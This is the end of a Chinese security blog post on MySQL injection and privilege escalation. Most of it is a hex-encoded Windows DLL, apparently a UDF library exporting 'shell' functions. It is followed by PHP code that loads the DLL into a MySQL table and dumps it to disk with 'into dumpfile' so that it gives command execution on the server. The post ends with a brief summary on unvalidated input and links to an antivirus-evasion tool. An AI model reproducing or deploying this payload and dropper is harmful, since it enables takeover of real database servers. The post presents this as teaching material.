96E676C654F626A6563740018025265616446696C650000F9015065656B4E616D65645069706500440043726561746550726F63657373410000500147657453746172747570496E666F41004300437265617465506970650000F70047657443757272656E7450726F63657373006D014765745469636B436F756E740000EF014F70656E50726F63657373003E0147657450726F63416464726573730000C2014C6F61644C696272617279410000D2025769646543686172546F4D756C74694279746500B001496E7465726C6F636B6564496E6372656D656E740000AD01496E7465726C6F636B656444656372656D656E740000D6014D6170566965774F6646696C6500350043726561746546696C654D617070696E67410000B002556E6D6170566965774F6646696C6500120147657446696C6553697A6500570044656C65746546696C654100340043726561746546696C654100630147657454656D7046696C654E616D65410000650147657454656D7050617468410000550044656C657465437269746963616C53656374696F6E00C1014C65617665437269746963616C53656374696F6E00006600456E746572437269746963616C53656374696F6E0000AA01496E697469616C697A65437269746963616C53656374696F6E004B45524E454C33322E646C6C0000D3004578697457696E646F77734578005553455233322E646C6C0000170041646A757374546F6B656E50726976696C6567657300F5004C6F6F6B757050726976696C65676556616C7565410042014F70656E50726F63657373546F6B656E0000EF004C6F6F6B75704163636F756E745369644100D000476574546F6B656E496E666F726D6174696F6E005B01526567436C6F73654B6579007B01526567517565727956616C7565457841000072015265674F70656E4B657945784100860152656753657456616C75654578410000640152656744656C65746556616C7565410071015265674F70656E4B657941005E015265674372656174654B6579410041445641504933322E646C6C00002E00436F496E697469616C697A65457800006F6C6533322E646C6C000B013F3F315F4C6F636B697440737464404051414540585A0000A2003F3F305F4C6F636B697440737464404051414540585A00004D5356435036302E646C6C005753325F33322E646C6C00003D0261746F6900005E02667265650000B202737072696E74660091026D616C6C6F63000059015F6D6273636D70005F015F6D627369636D700000BE027374726C656E00000F003F3F3240594150415849405A0000C502737472737472000099026D656D7365740000E6027763736C656E000049005F5F4378784672616D6548616E646C65720096026D656D636D70000092015F7075726563616C6C00AD027365746C6F63616C6500DC0276737072696E74660000BA027374726370790000C1015F73747269636D7000004D53564352542E646C6C00000F015F696E69747465726D009D005F61646A7573745F6664697600000C004765744D6F64756C65426173654E616D654100000E004765744D6F64756C6546696C654E616D6545784100000400456E756D50726F636573734D6F64756C657300000500456E756D50726F6365737365730050534150492E444C4C000800575453467265654D656D6F7279000C00575453517565727953657373696F6E496E666F726D6174696F6E41000600575453456E756D657261746553657373696F6E73410057545341504933322E646C6C000057494E494E45542E646C6C0000000000000000000000000000000000BFC7514B00000000665200000100000003000000030000004852000054520000605200003314000020140000F4130000725200007852000085520000000001000200546573745544462E646C6C007368656C6C007368656C6C5F6465696E6974007368656C6C5F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000D0490010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000140100000F30163039304E305D307330C430F630043110313F3166317C319C31A531BD31F6310F3231323B3242325A327432B332C632D532193336338733A433F833013407340D34293439349634B234C334DB34033510356D357E359D351436CD36D436DC360137373723383238623874389D38B8382B3969398D39AF39E839013A113A403A483A5D3A713A803ACE3ADF3AE53AF33AF83A063B403B503B693B723B823B8B3B9B3BA43BE43B033C123C1B3C203C263C2D3C343C4A3C533C583C5E3C653C6C3CA53CAB3CC43C333D443D683D6F3D7C3D833D9F3DFC3D013E1E3E2C3E4F3E553E803E9E3EA33EC63EEF3EF63E023F203F403F573F603F713F813F8C3F963FBF3FC53FDC3FF63FFF3F000000200000F0000000283051305830653076308E30B230D230E130F53012312C3146315D317231A431DB31EE3116323C32533268328532A832B332BE32D432F43245336D33B633BB33C233C933CF33143456345D34663475349E34A4341935413555358435AE35C335D5350C36473675369336BC36EE368B37B637F0383739E839EE39F639FD39093A123A263A6A3A713A913AD03BD63BDE3BE43BEE3B123C9A3CBA3CF63C3C3D873D953D9E3DB13DD33DDD3D013E1F3E3D3E5B3E7E3E8E3EB83ECD3ED43EF03EF63EFC3E023F423F723F783F7E3F8C3F943F9A3FA53FB23FBA3FC83FCD3FD23FD73FE23FEF3FF93F000000300000280000000E301A30203042305430B030CC30D230D830DE30E430EA30F030F63003310000004000002C00000098318039843988398C39A039A439A839AC39B039B439B839BC39C039C439843A903A0000006000000C00000014300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,CHAR)));if (mysql_errno($conn) != 0) {echo mysql_error().<br/>;mysql_close($conn);exit();}mysql_query(select c from udftmp into dumpfile ".$path.");if (mysql_errno($conn) != 0) {echo mysql_error(). <br/>;mysql_query(drop table udftmp);mysql_close($conn);exit();}mysql_query(drop table udftmp);if (mysql_errno($conn) !=0)echo Dump DLL Failed..mysql_error();elseecho Dump DLL Success!;mysql_close($conn);}?></body></html>
总结
注入产生原因就是对用户输入的数据未进行严格校验,导致可以构造恶意语句。
本篇文章仅仅介绍MYSQL的基础。
本文作者: oudeniu本文链接: https://butnomingzi.github.io/posts/c118d50/版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!总结 漏洞 MYSQL
PowerShell免杀工具 xencrypt
Python Scapy小工具
文章目录站点概览1. MySQL安装及配置1.1. Mysql安装(这里版本为8.0.17)1.2. 登陆MySQL及配置密码1.3. MySQL命令学习1.4. Mysql系统表利用2. MySQL注入基础3. MySQL提权版权申明
本文系作者 @河马 原创发布在河马博客站点。未经许可,禁止转载。
暂无评论数据